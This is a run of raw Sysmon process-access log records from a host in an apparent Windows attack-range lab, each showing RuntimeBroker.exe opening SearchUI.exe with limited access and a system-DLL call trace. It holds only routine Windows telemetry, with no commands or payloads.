12:02:31.648{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006994Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.648{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006993Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.648{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006992Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.648{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006991Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.648{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006990Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.648{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006989Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.648{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006988Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.648{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006987Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.648{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006986Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.648{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006985Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.648{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006984Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.648{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006983Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.648{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006982Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.648{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006981Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.648{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006980Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.648{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006979Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.648{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006978Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.648{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006977Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.648{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006976Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 